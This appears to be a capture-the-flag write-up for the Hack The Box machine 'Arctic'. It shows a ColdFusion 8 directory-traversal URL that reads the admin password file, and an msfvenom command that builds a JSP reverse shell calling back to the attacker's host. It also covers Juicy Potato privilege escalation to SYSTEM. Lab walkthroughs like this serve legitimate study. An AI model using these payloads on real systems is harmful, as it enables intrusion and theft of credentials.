Arctic

Overview

Initial Foothold : RCE from ColdFusion Application running on port 8500

Privilege Escalation :

Enumeration

Start with port scanning

Port Scanning

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC

After Running full port scan we only got three ports open

Port 8500 looks interesting Lets enumerate this port

Port 8500 Enumeration

There were some directory on this ports lets open them

ColdFusion was running in this directory

ColdFusion is the famous CMS and also have many vulnerabilites

We can observe that the version is COLDFUSION 8

we can search for possible exploits of this version

Got some exploits

Start with Directory Traversal exploit

Adobe ColdFusion - Directory TraversalExploit Database

According to this exploit the vuln is present in

Now we will try to find the password using this directory traversel vulnerablity

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en10.10.10.11

Using the above url payload we got the content of password.properites file

Lets decrpyt the hash using crackstation.net site

Yeah got the password as happyday

Using this password try to login into the admin sectioin of the site

Successfully logged in as administrator

Exploitation

There are two ways for exploiting this CMS

1. Using task scheduler

2. Using arbitary file upload vulnerabilty

Using Task Scheduler

There was an option in the CMS where we can schedule task

Here we can create our own task and will then execute it to download malicious file and then execute it on the victim machine

But we need to find the file path where we have to save the file

We can get the full file path from mapping section of the settings

Now create task in scheduler

Before that create payload in jsp format using msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp

Host this file on our machine

And task is scheduled

Now execute this task and the shell.jsp file will be downloaded and will be saved in /CFIDE/ directory

Launch netcat listener on our host machine

Execute the payload using the path we specified where the exploit is saved

Got the reverse shell

Another way

Using Arbitary file upload Exploit for ColdFusion

After some googling i found a exploit for coldfusion 8 which will upload file on the web server

Uncategorized/exploit/windows/CVE-2009-2265_coldfusion.8.0.1/upload.py · 01a0616a6e09c9dbf42d731261309109443cc3e6 · pentesting / toolsGitLab

In this exploit we just have to provide the path of the web server

lets use this exploit

This exploit successfully uploaded the payload and also provided us the path from where we can execute our payload

Setup listener and execute the payload

And we got back the shell

Privilege Escalation

After getting shell from any service always check privileges of the user account

SeImpersonatePrivilege was enabled so we can abuse this service token for privilege escation

You can find more information about this at

Abusing Token Privileges For Windows Local Privilege Escalationfoxglovesec

For abusing this token we will use

GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

This exploit require reverse shell binary

generate reverse shell using msfvenom

Now transfer shell.exe and juicypotato.exe to the windows host machine

We will need CLSID for this exploit we can obtain CLSID from the juicy-potato github repo

juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise at master · ohpe/juicy-potatoGitHub

We will try with First CLSID

And we got back the reverse shell with elevated privileges

There is another way for privilege escation which is kernel exploit you can find more information about kernel exploits from the Optimum Box of htb

That's all for this machine

Good Bye :)